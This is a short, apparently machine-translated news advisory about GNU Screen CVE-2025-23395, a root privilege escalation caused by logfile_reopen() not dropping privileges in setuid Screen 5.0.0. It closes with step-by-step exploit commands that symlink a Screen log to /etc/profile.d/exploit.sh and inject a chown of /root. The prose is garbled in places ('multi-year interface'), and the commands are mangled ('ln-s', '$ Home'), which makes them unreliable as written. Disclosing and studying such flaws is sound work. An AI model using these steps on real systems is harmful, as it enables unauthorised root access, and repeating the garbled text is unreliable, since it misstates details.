In the console window manager, gnu screen, used for providing a multi-year interface in the console, has recently disclosed 5 vulnerabilities. Among these, the most severe issue identified as CVE-2025-23395 allows unauthorized users to obtain Root access in the system. A fix has been implemented in the latest version, screen 5.0.1.
The vulnerability identified as CVE-2025-23395 is specific to the Screen 5.0.0 branch. This vulnerability affects systems that install Screen with the Setuid Root flag turned on. In systems like Fedora, Arch Linux, NetBSD, OpenBSD, and Alpine, the vulnerability can be exploited. However, the Screen 4.X branch is still being supplied for Debian, Ubuntu, RHEL (EPEL9), Gentoo, FreeBSD, SUSE/OpenSUSE, and OpenWRT. In Fedora, the utility is placed with the SETGID flag to ensure the rights of the Screen group, limiting the attack surface for maintenance services.
This vulnerability arises due to the Logfile_reopen() function being executed without privileges being dropped when Screen is launched with Root rights. While the initial opening of the log file is done with the correct privilege discharge, subsequent reopenings fail to drop privileges. By manipulating session content, an attacker can gain access to the Root file, even though the file itself may reside in the user’s home directory.
The attack involves creating the /etc/profile.d/exploit.sh file using the following commands:
- Create a Screen session with the command Log $ Screen -logfile $ Home/Screen.log
- Press CTRL-A-H to activate logging
- Delete the log file and replace it with a symbolic link to create /etc/profile.d/exploit.sh $ rm $ home/screen.log; ln-s /etc/profile.d/exploit.sh $ home/screen.log
- Return to the SCREEN session and output data to the screen to be written to the log file $ echo -e “nchown $ user /root;”